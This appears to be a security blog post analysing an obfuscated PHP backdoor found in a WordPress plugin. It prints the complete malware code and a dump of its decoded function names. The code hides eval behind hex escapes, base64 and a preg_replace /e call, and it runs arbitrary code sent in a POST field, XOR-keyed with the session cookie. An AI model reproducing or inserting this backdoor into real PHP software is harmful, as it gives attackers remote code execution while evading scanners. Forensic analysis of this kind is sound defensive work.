PHP Coding Exploit Analysis

Tags

code, digital forensics, exploit, hacker, malware, obfuscation, php exploit, Security

Introduction

Last week was busy for exploit attempts! In fact I spent a full 5 days cleaning up PHP files and finding new hacking attempts.

This specific exploit pop’d up just this week, yet again its from a WordPress site and specifically the code entered via a plugin. It employs a different coding style, a mix of techniques (see the article in the reference below for some in-depth analysis), its easy to spot by the human eye but tricky to pick up with detection programs.

Its yet a different way to code an exploit that does not immediately use the keyword “eval” in plain text as most do.

Synopsis

If your not going to read the full article, here is a summary (please spend the few minutes reading everything, you will learn something).

• Exploit coding techniques are changing weekly.
• eval(), a common entry point to activating the code is hidden.
• Reverse XOR used on downloaded data that is base64 encoded.
• Implements function calls using variables.

First, the code, neatened up to show functions and declarations clearly:

<?php

$O="\x65";  //'e'

$_="\x62\x61\x73$O\x36\x34\x5f\x64$O\x63\x6f\x64$O"; // base64_decode

$_1=$_("YXJyYXlfbWFw"); // array_map

$S=$_1($_,array("Y2hy","b3Jk","c3Vic3Ry",

    "c3RyX3JlcGVhdA","c3RybGVu","am9pbg",

    "YXJyYXlfbWFw","c3RyX3NwbGl0","emxpYl9kZWNvZGU",

    "ZXZhbCgiJGMiKQ","cHJlZ19yZXBsYWNl","c3RyaXBzbGFzaGVz",

    "Ly4qL2U","X1BPU1Q","X0NPT0tJRQ","UEhQU0VTU0lE","ZXhpdA","ZQ","KCk7",));

// $S becomes a list of PHP keywords

function x($c,$k)

{

    global $S;

    return $S[0]($S[1]($c)^$S[1]($k));

// return chr(ord($c) ^ ord($k));   XOR c and K

}

 

function d($d,$k)

{

    global $_,$S;

    $i=2;

    $X=$_($d); // base64_decode($d)

// substr( str_repeat( )

//             2      3      3      4                 4                  4                      4       5

    $y=$S[$i++]($S[$i++]($k,1+($S[$i]($X)/$S[$i]($k))),0,$S[$i++]($X));

//                   5       6          6       7               7              7      8

    return $S[$i++]("",$S[$i++]("x",$S[$i]($X),$S[$i++]($y)));

}

 

function e($c)

{

    global $S;

// preg_replace( /.*/e  , stripslashes( eval(“$c”),””);

    return $S[10]($S[12],$S[11]($S[9]),"");

}

//e(    _POST   ['q']     _COOKIE[PHPSESSID]  

$S[17](d(${$S[13]}["\x71"],${$S[14]}[$S[15]]));

// calls function e( exit () );   exit gets modified ?

$S[17]($S[16].$S[18]);

?>

A dump of the variables gives a clear clue as to what the code executes:

   [O] => e

    [_] => base64_decode

    [_1] => array_map

array_mapArray

(

    [0] => chr

    [1] => ord

    [2] => substr

    [3] => str_repeat

    [4] => strlen

    [5] => join

    [6] => array_map

    [7] => str_split

    [8] => zlib_decode

    [9] => eval("$c")

    [10] => preg_replace

    [11] => stripslashes

    [12] => /.*/e

    [13] => _POST

    [14] => _COOKIE

    [15] => PHPSESSID

    [16] => exit

    [17] => e

    [18] => ();

)

The techniques here differ from many exploits, an array of function calls, all hidden are assembled and then executed using array references. The eval function is hidden as well, so most scanning attempt fail immediately and attempts to find base64 encoded strings of long lengths will fail as the code is normalized to some extent to bypass current scanners.

Like  many exploits the code uses POST variables to complete its actions. By replacing this code with a shell thats stores the calls used by the exploiters I have determined its used as a simple mailer. However its loading capability allows any code to be executed.

References

• https://www.conetix.com.au/blog/php-superglobals-exploit
• https://www.conetix.com.au/blog/byte-encoding-exploits-php-files
• https://z900collector.wordpress.com/2015/07/07/capturing-calls-to-exploited-code/